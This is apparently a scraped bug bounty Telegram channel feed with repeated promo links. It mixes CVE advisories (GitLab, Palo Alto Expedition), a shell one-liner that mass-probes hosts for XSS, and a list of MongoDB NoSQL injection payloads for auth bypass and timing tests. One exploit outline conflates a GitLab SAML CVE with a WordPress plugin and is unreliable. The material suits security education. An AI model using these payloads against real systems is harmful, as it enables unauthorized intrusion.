Bug bounty Tips

XSS from javascript hidden params

assetfinder *.com | gau | egrep -v '(.css|.svg)' | while read url; do vars=$(curl -s $url | grep -Eo "var [a-zA-Z0-9]+" | sed -e 's,'var','"$url"?',g' -e 's/ //g' | grep -v '.js' | sed 's/.*/&=xss/g'); echo -e "\e[1;33m$url\n\e[1;32m$vars"

exploit + lab setup for CVE-2024-45519 🔥 Github #Cve #Exploit 💎

Nmap Commands Cheat Sheet 🧿 🔖#infosec #cybersecurity #hacking #pentesting #security

💉Bug Bounty Tools & Techniques 🪱Exploit Vulnerabilities 😇Web Application Security 👻Pentesting Insights 👣Exclusive Bug Bounty Courses 🗄🗄🗄🗄🗄🗄🗄🗄🗄🗄🗄 🔴 https://t.me/+VtRjobkjTjw4OGVk 🔹 https://t.me/+VtRjobkjTjw4OGVk 🔹 https://t.me/+VtRjobkjTjw4OGVk

#promo

I have posted here https://t.me/+6B7E8w2o9w45MDc1

Bug Bounty Course If you are interested in bug bounty and penetration testing have a look at our channel. Link : click here

I have posted here https://t.me/+6B7E8w2o9w45MDc1

🚨 No Sql Injection - Mongo DB Payloads 🚨 true, $where: '1 == 1' , $where: '1 == 1' $where: '1 == 1' ', $where: '1 == 1 1, $where: '1 == 1' { $ne: 1 } ', $or: [ {}, { 'a':'a ' } ], $comment:'successful MongoDB injection' db.injection.insert({success:1}); db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emit(1,1 || 1==1 || 1==1// || 1==1%00 }, { password : /.*/ } ' && this.password.match(/.*/)//+%00 ' && this.passwordzz.match(/.*/)//+%00 '%20%26%26%20this.password.match(/.*/)//+%00 '%20%26%26%20this.passwordzz.match(/.*/)//+%00 {$gt: ''} [$ne]=1 ';sleep(5000); ';it=new%20Date();do{pt=new%20Date();}while(pt-it<5000); {"username": {"$ne": null}, "password": {"$ne": null}} {"username": {"$ne": "foo"}, "password": {"$ne": "bar"}} {"username": {"$gt": undefined}, "password": {"$gt": undefined}} {"username": {"$gt":""}, "password": {"$gt":""}} {"username":{"$in":["Admin", "4dm1n", "admin", "root", "administrator"]},"password":{"$gt":""}}

🚩 A critical security flaw in #GitLab (CVE-2024-9164) could allow attackers to run CI/CD pipelines on unauthorized branches. Update your instance ASAP to avoid becoming the next victim.

Palo Alto Expedition: Critical Vulnerabilities Exposed 👨‍💻 Researchers at Horizon3.ai 👨‍💻 have discovered critical vulnerabilities in Palo Alto Expedition, a migration tool used to convert configurations from other vendors to Palo Alto Networks systems. 🛡 These vulnerabilities could allow attackers to remotely reset admin credentials, steal sensitive data, and gain unauthorized access to the application. 🔑 Key vulnerabilities include: ➡️ CVE-2024-9463 and CVE-2024-9464: OS command injection ➡️ CVE-2024-9465: SQL injection ➡️ CVE-2024-9466: Cleartext storage of sensitive information ➡️ CVE-2024-9467: Cross-site scripting (XSS) 🔐 If you're using Palo Alto Expedition, it's crucial to patch these vulnerabilities immediately. Video PoC ➡️ https://youtu.be/AF37ncAq__E?si=D6E2IkTONcAKyGQQ

Bug Bounty for Beginners 💰 🔖#infosec #cybersecurity #hacking #pentesting #security

*CVE-2024-45409 | Ruby-SAML Auth Bypass In GitLab* _*What You’ll Learn💡*_ 1️⃣ *Overview | Discription of CVE-2024-45409* 2️⃣ *Reconnaissance For CVE-2024-45409* *Shodan.io* *Censys.io* *Fofa.info* *Hunter.how* *ZoomEYE.HK* _<======================>_ 3️⃣ *E͢x͢p͢l͢o͢i͢t͢ ☣️ CVE-2024-45409 | GiveWP WordPress Plugin Exploit* 4️⃣ *E͢x͢p͢l͢o͢i͢t͢ Installation📥* 5️⃣ *E͢x͢p͢l͢o͢i͢t͢ Tool Guide🧭* 6️⃣ *Impact_💥* 7️⃣ *Severity_⚠️* 8️⃣ *Remediation_♻️* _https://yashsec.com/bug-bounty/cve-2024-45409-auth-bypass-in-gitlab/